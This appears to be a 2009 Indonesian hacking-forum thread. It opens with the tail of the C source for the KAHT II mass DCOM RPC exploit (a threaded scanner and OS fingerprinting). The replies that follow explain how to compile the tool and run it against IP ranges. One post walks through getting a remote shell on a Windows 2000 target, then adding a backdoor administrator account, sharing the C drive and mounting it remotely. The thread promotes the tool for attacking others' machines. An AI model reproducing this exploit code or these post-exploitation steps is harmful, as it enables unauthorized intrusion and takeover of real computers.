//			if (buf[i+32]!=win2kvuln[i])
//			{
				send(sock,peer0_1,sizeof(peer0_1),0);
				if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
				{
					memset(buf,'\0',sizeof(buf));
					l=recv (sock, buf, sizeof (buf),0);
					if (l==32)
					{
						closesocket(sock);
						return(1);//winxp
					}
					else
					{
				      #ifdef WIN32
					 closesocket(sock);
				      #else
					 close(sock);
				      #endif
					 return(0);//Unknown
					}
				}
				else return(-1);
//			}


		//}
//		closesocket(sock);
//		return(0);//win2k
	}
	closesocket(sock);
	return(-1);		//Unknown
}
/********************************************************************************/

void checkea(void *threadn)
{
	char ip[16];
	char ip2[17];
	int sock,i;
	struct sockaddr_in target_ip;
	fd_set fds;
	u_long tmp=1;
	struct timeval tv;


	EnterCriticalSection(&css);
	threads++;
	sleep(1);
	LeaveCriticalSection(&css);
	memset(ip,'\0',sizeof(ip));
	while (givemeip(ip)!=NULL)
	{
		//printf("Checkeando IP: %s\n",ip);
		target_ip.sin_family = AF_INET;
	   	target_ip.sin_addr.s_addr = inet_addr(ip);
                target_ip.sin_port = htons(139);
		closesocket(sock);
	    if ((sock=socket(AF_INET,SOCK_STREAM,0)) != -1)
	    {
			tmp=1;
			ioctlsocket( sock, FIONBIO, &tmp);
			tv.tv_sec = CONNECT;
			tv.tv_usec = 0;
			FD_ZERO(&fds);
			FD_SET(sock, &fds);

		    connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip));
			//if((i=select(sock+1,0,&fds,0,&tv))==SOCKET_ERROR) { }
			//if((i=select(sock+1,0,&fds,0,&tv))==SOCKET_ERROR) { }
		 //   else if (i==0) {
		//	   printf("i==0 ip: %s\n",ip); }
		  //  else
		  if((i=select(sock+1,0,&fds,0,&tv))>0)
		    {
				sprintf(ip2,"%s\n",ip);
				EnterCriticalSection(&cslog);
				fputs(ip2,results);
				rpcopen++;
				LeaveCriticalSection(&cslog);
				attack(ip,version(ip,sock));


			}
		}
		closesocket(sock);
		memset(ip,'\0',sizeof(ip));
	}
	EnterCriticalSection(&css);
	threads--;
	sleep(1);
	LeaveCriticalSection(&css);
	//printf("Thread %i saliendo\n",(int)threadn);
	_endthread();

}[/size]

/******************************************************************************/

Re: KAHT II - MASSIVE RPC EXPLOIT (masih lumayan loh) hihihi...

Posted: Fri Jun 26, 2009 12:03 am
by d-e-s-t-r-o-y-e-r
maaf saya msh newbie bs jelaskan loe lage ngapain

Re: KAHT II - MASSIVE RPC EXPLOIT (masih lumayan loh) hihihi...

Posted: Fri Jun 26, 2009 1:31 am
by oki_machine
@ d-e-s-t-r-o-y-e-r
itu d'copy & d'paste ke borland C++, bis itu d'jlanin lwat perintah CMD!
cba baca yg ini kak! http://forum.cyberdos.org/viewtopic.php?id=1073 :mrgreen: :mrgreen: :mrgreen:
mav klw ada kesalahan dlm postqu kak!
aqu masi jaoh d'bwah newbie soalnya! hehe,,,,,,,,,
@wiLMaR_kiDz
mav kak, aqu mw nanyanih, apa kelebihan KAHT II dri KAHT I ?

Re: KAHT II - MASSIVE RPC EXPLOIT (masih lumayan loh) hihihi...

Posted: Fri Jun 26, 2009 2:00 am
by adiwijaya
kaht udah ga bisa dijalanin untuk XP sp 2 atau sp 3, itu cuma bisa jalan di sp1

Re: KAHT II - MASSIVE RPC EXPLOIT (masih lumayan loh) hihihi...

Posted: Fri Jun 26, 2009 9:51 pm
by wiLMaR_kiDz
oki_machine wrote:
@ d-e-s-t-r-o-y-e-r
itu d'copy & d'paste ke borland C++, bis itu d'jlanin lwat perintah CMD!
cba baca yg ini kak! http://forum.cyberdos.org/viewtopic.php?id=1073 :mrgreen: :mrgreen: :mrgreen:
mav klw ada kesalahan dlm postqu kak!
aqu masi jaoh d'bwah newbie soalnya! hehe,,,,,,,,,
@wiLMaR_kiDz
mav kak, aqu mw nanyanih, apa kelebihan KAHT II dri KAHT I ?
bener ,emang harus lewat cmd. kaht.exe-nya lngsung di drag & drop ke cmd, atau copy path-nya trus paste di cmd..
kalo g slh, kaht tu slah 1 nya buat vuln RPC DCOM dSP1.skarang d SP2 ma SP3 udh d Patch pastinya ama Microsoft..
tapi ane kmren ad baca2 (lupa dmn), ada bugs lewat windows kernel dSP2 n SP3.jd ntar bisa take over.ingat, wlwpun portnya kbuka, blm tntu berarti bisa qta exploit.tergantung aplikasi yg brjalan d atas port tuh juga...
klo emang gak vuln, berarti....... :putusasa:
*POC-ny :
kaht is DCOM exploit ,Langkah pertama yaitu: download program kaht II dulu, atw tgl copas yg neh atw yg di atas, atau (googling aj)trsrah ente.letakkan di direktori ssuai dgn keinginan ente.biasanya bntuk file dlm Zip.cba extract file trsbut.klo ud d ekstrak, kaht bru bsa d gunakan.

Next>> tentukan alamat ip target, misal : 192.168.0.12
selanjutnya : Kaht 192.168.0.11 192.168.0.12
Keterangan :
192.168.0.11 adalah IP (komputer tagret) awal
192.168.1.12 adalak IP (komputer target) akhir

krna disini kita akn mngexploitasi ip 192.168.0.12, kita gunakan
kaht 192.168.0.11, 192.168.0.12. krna ip 192.168.0.11 yg mrupakan range
trkecil, agr exploitasi brjjln lbih cpt ssuai dgn target kita. kl komputer target brhasil d exploitasi, maka akn muncul tmpilan krang lbih sbgai brikut :

Code: Select all

------------------------------------------------------------------------
                        KAHT II - MASSIVE RPC EXPLOIT
              DCOM RPC exploit, Modified by [email protected]
               #haxorxitos && #localhost @efnet Ownz you!!!
                          Full VERSION :) AUTOHACKING
-------------------------------------------------------------------------
[+] Targets : 192.168.0.11-192.168.0.12 eith 50 Threads
[+] Attacking Port. Remote Shell At ports: 36388
[+] Scan in Progress....
- Connecting to 192.168.0.12
   Sending Exploit to a [win2k] Server....
- Connectando con la shell REmote...

Microsoft Windows 2000 [VErsion 5.00.2195]
<C> Copyright 1985-2000 Microsoft Corp.

c:\WINNT\system32>
nah, smpai d sini, kita sdh brhasil msuk k komputer target dan kita
berada di directory: c:\WINNT\system32>
Sampai disini terserah ente mw malkukan apapun, sesuai keinginan ente.disini kita akn coba malakukn sharing file & mmbuka file sharingan
trsebut di komputer kita dgn trlebih dhulu mnambahkan user ID stingkat administrator.Utk mlakukan penambahan user di pc Target :

Code: Select all

C:WINNTsystem32>net user paluared ck ck ck /add
                          ^         ^
                     nama_user    password_user
net user paluared idiot /add
The command completed successfully.
Ket : disini kita menggunakan perintah :

Code: Select all

net user nama_user password_user /add
brdasarkan printah d atas, kita mnambahkan user paluared dgn password idiot, stelah user berhasil d buat, slanjutnya kita memberikan autority pd user paluared dlm groups administrator :

Code: Select all

C:\WINNT\system32>net localgroup Administrators paluared /add
                                            ^             ^
                                  nama_group     nama_user                     
net localgroup Administrators paluared /add
The command completed successfully.
*Ket : d atas kita mnggunakan printah :

Code: Select all

net localgroup Nama_gorups nama_user /add
brdasarkan printah d atas, net localgroup. berarti kita
mnambahkan user paluared k dlm groups administrator pd kumputer local (kompi target). administrators adlh groups dri administrator trsbt & utk paluared adlah nma user yg d tambahkan k dlm group administrator.stelah masuk, cb ente bwt user gruops administratornya :

Code: Select all

C:WINNTsystem32>net user paluared such /add
                           ^       ^
                          user    password
abz tuh, msukan user paluared ke gruops administrator :

Code: Select all

C:WINNTsystem32>net localgroup Administrators paluared /add
setelah itu sharing drive-nya :

Code: Select all

C:WINNTsystem32>net share c=c:
catatan user id nya terserah ente, mw d ksih nma apa ssuai keinginan.hmm..klo utk mnggunakan sharing drive trsebut, bisa ente gunakan perintah net use. cranya??.pertama buka dos promt di komputer qta, lalu ketikkn brikut :

Code: Select all

c:> net use * \\ip_address\drive_c * /u:paluared
Type the password for \\ip_addres\C:  <--- masukan password disini
*Ket : berdasarkan perintah diatas IP address adalh IP kompi target, dan drive_c adlah nma sharing drive dri kompi taget & utk u:/paluared bhwa kita msuk dgn mnggunakn user paluared (biasanya d dlm winxp/win2000, trdpt sharing defaultnya.yaitu : C$, d$ dst..
klo sang admin blm mrubah hal trsebut, kita dpt lngsung mlakukan net use atau tnpa mlakukan net share brdasarkan default sharing ini...
cat IP-Addres, bisa jg di isi dgn nama kompi. utk kterangan nya, ente bsa baca manualnya net use /?.stelah brhasil bisa liat d windows explorer.

Code: Select all

C:\WINNT\system32>net share  drive_c=c:   
                                     ^      ^
                       nama_sharing  drive_sharing
net share  Drive_c=c:c was shared successfully.
*Ket : berdasarkan printah diatas, kita melakukan stelah sharing drive.yaitu drive C dgn mmberikan nama drive_C[/code]
Nahh...sekarang giliran ane boleh nanya kan?????.....
Apa stiap org udah pada pake sp3?????.......
belum tentu mas. . . . . :putusasa: :putusasa: :ngakak: :ngakak: :ngakak:

Re: KAHT II - MASSIVE RPC EXPLOIT (masih lumayan loh) hihihi...

Posted: Sun Jun 28, 2009 7:14 pm
by franky_muchtar
KAHT II sudah lama sekali..
Cobalah pke exploit samba port 445....

Re: KAHT II - MASSIVE RPC EXPLOIT (masih lumayan loh) hihihi...

Posted: Fri Jul 03, 2009 8:06 am
by untitled
Kakak, Kaht II nyerang port brapa?? 135 yach??
g pernah coba kaht II yang di download dari internet, ip nya vuln, tapi gak bisa di serang / take over.. kenapa yah??
tq....

Re: KAHT II - MASSIVE RPC EXPLOIT (masih lumayan loh) hihihi...

Posted: Sat Jul 04, 2009 11:42 pm
by gblack
Belajar Metasploit ama rumput_kering gih...
Dia bs jadi juara II JogjaHack kan make Kaht :mrgreen:

Re: KAHT II - MASSIVE RPC EXPLOIT (masih lumayan loh) hihihi...

Posted: Sun Jul 05, 2009 2:19 pm
by wiLMaR_kiDz
untitled wrote:Kakak, Kaht II nyerang port brapa?? 135 yach??
g pernah coba kaht II yang di download dari internet, ip nya vuln, tapi gak bisa di serang / take over.. kenapa yah??
tq....
adiwijaya wrote:kaht udah ga bisa dijalanin untuk XP sp 2 atau sp 3, itu cuma bisa jalan di sp1
ngelih wrote:KAHT II sudah lama sekali..
Cobalah pke exploit samba port 445....
tuwhhh....denger apa kta Guru gblack.... :malumalu: :malumalu: :malumalu:
mkanya ane brani share in... :ngakak: :ngakak:

Re: KAHT II - MASSIVE RPC EXPLOIT (masih lumayan loh) hihihi...

Posted: Mon Jan 25, 2010 6:06 am
by franky_muchtar
Use Metasploit....
More powerfull...

http://web-vuln.blogspot.com